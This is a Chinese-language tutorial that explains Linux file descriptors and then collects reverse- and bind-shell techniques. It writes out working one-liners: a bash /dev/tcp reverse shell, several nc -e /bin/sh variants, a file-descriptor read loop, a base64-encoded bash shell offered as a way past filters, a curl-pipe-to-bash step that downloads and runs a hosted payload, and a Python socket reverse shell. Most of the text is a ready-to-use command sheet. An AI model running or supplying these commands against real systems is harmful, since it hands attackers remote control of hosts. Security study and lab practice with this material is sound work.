文件描述符及Linux下利用反弹shell的各种方法

1、文件描述符(File Descriptor,FD)

本质:Liux内核给进程的非负整数标识,用于定位"打开的文件、设备、网络连接"(因iux遵循"一切

文件"设计,socket.、管道等/O资源也用文件描述符管理)。

默认值:每个进程启动时自动打开3个标准描述符:

o:标准输入(stdin,如键盘):

o1:标准输出(stdout,如终端屏幕);

o2:标准错误(stderr,如终端屏幕,专用于错误输出)。

自定义:用户可通过exec命令创建新描述符(如exec3<>file.txt让描述符3读写file.txt)。

tail打开一个文件

tail -f flag

获取tail进程PID

pidof tail

查看tail进程创建的文件描述符

ll /proc/98/fd

重定向是把输出定向到文件或者标准流。重定向输入输出本质上就是重定向文件描述符。

在linux中有个特殊的文件------/dev/null,所有写入的东西都会被清空

2、bash反弹shell原理

被控端

bash -i >& /dev/tcp/192.168.58.132/6666 0>&1

***

bash -i

打开一个交互式的bash shell。

>&,&>:混合输出,是把标准输出和错误输出都给了目标显示

0>&1:将标准输入的读取对象设置为标准输出的输出对象

/dev/tcp/IP/PORT

/dev/tcp/是Linux中的一个特殊设备文件(Linux一切皆文件),实际这个文件是不存在的,它只是 bash 实现的用来实现网络请求的一个接口。

打开这个文件就相当于发起了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。

/dev/tcp/192.168.58.132/6666

和192.168.58.132的6666端口建立TCP连接

***

控制端

nc --lvvp 6666

3、Linux反弹shell方法(看不同环境使用不同方法)

命令终端可以执行系统指令的地方就叫shell

(1)NC

nc正向shell

控制端:

nc 192.168.58.132 6666

被控端:

nc -lvvp 6666 -e /bin/sh

原 理:

被控端使用nc将/bin/sh绑定到本地的6666端口,控制端主动连接被控端的6666端口,即可获得shell

  • -e:是 Netcat 的参数,全称是 --exec,表示 "在建立网络连接后,执行指定的程序";
  • /bin/sh:是 Linux 系统中的 Shell 程序(等价于 bash 等交互式命令解释器);

nc反向shell

控制端:

nc -lvvp 6666

被控端:

nc -e /bin/sh 192.168.58.134 6666

原理:

被控端使用nc将/bin/sh发送到控制端的6666端口,控制端只需要监听本地的6666端口,即可获得shell。

通过文件描述符5,把 "控制端的输入(命令)"→"被控端的 Shell 执行"→"执行结果 / 错误返回控制端" 的全流程绑定到 TCP 连接上,最终实现和nc -e /bin/sh一样的反向 Shell 功能(但绕开了nc -e的限制)

被控端:

exec 5<>/dev/tcp/192.168.58.132/6666;cat <&5 | while read line; do $line 2>&5 >&5; done

控制端:

nc --lvvp 6666

(2)Bash

被控端:

bash -i >& /dev/tcp/192.168.58.132/6666 0>&1

控制端:

nc --lvvp 6666

base64编码绕过:

bash -c "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU4LjEzMi82NjY2IDA+JjE=|base64 -d|bash -i"

(3)curl

控制端创建一个html文件,然后开启http服务在托管该文件,然后目标用curl命令下载并执行

攻击者:

root@VM-0-2-ubuntu:~# cat index.html

bash -i >& /dev/tcp/IP/6666 0>&1

root@VM-0-2-ubuntu:~# python3 -m http.server

root@VM-0-2-ubuntu:~# nc -lvvp 6666

目标:

curl IP:8000|bash #bash读取管道传过来的内容(也就是刚下载的脚本),并立即执行其中的命令

(4)python

目标:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",6666));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

攻击者监听端口就好了

这种利用目标现有的语言环境反弹shell其实本质就是建造一个socket通信,像php什么语言也是一样的

相关推荐
名誉寒冰6 分钟前
AI云存储学习笔记:小文件优化 / 大文件分片 / 分享与 AI 搜索
linux·人工智能·笔记·学习
kubernetes-k8s12 分钟前
计划开始学习:OpenStack从入门到精通
linux·运维·服务器
江边鸟21914 分钟前
小迪安全第二十六天
网络·tcp/ip·安全·web安全·网络安全
天码-行空20 分钟前
【大数据环境安装指南】ZooKeeper搭建spark高可用集群教程
大数据·linux·运维·zookeeper·spark
无垠的广袤23 分钟前
【上海晶珩睿莓 1 单板计算机】物联网环境监测终端
linux·python·嵌入式硬件·物联网·mqtt·home assistant
Dovis(誓平步青云)24 分钟前
《拆解Linux中的IP协议与数据链路层:地址、路由与分片的底层逻辑》
linux·网络·tcp/ip
qq_4474294126 分钟前
Gemini CLI 非交互模式工具调用机制详解
linux·运维·服务器
代码游侠31 分钟前
复习——SQLite3 数据库
linux·服务器·数据库·笔记·网络协议·sqlite
chenyuhao20243 小时前
Linux网络编程:传输层协议UDP
linux·服务器·网络·后端·udp
小鹏linux3 小时前
【linux】进程与服务管理命令 - batch
linux·运维·服务器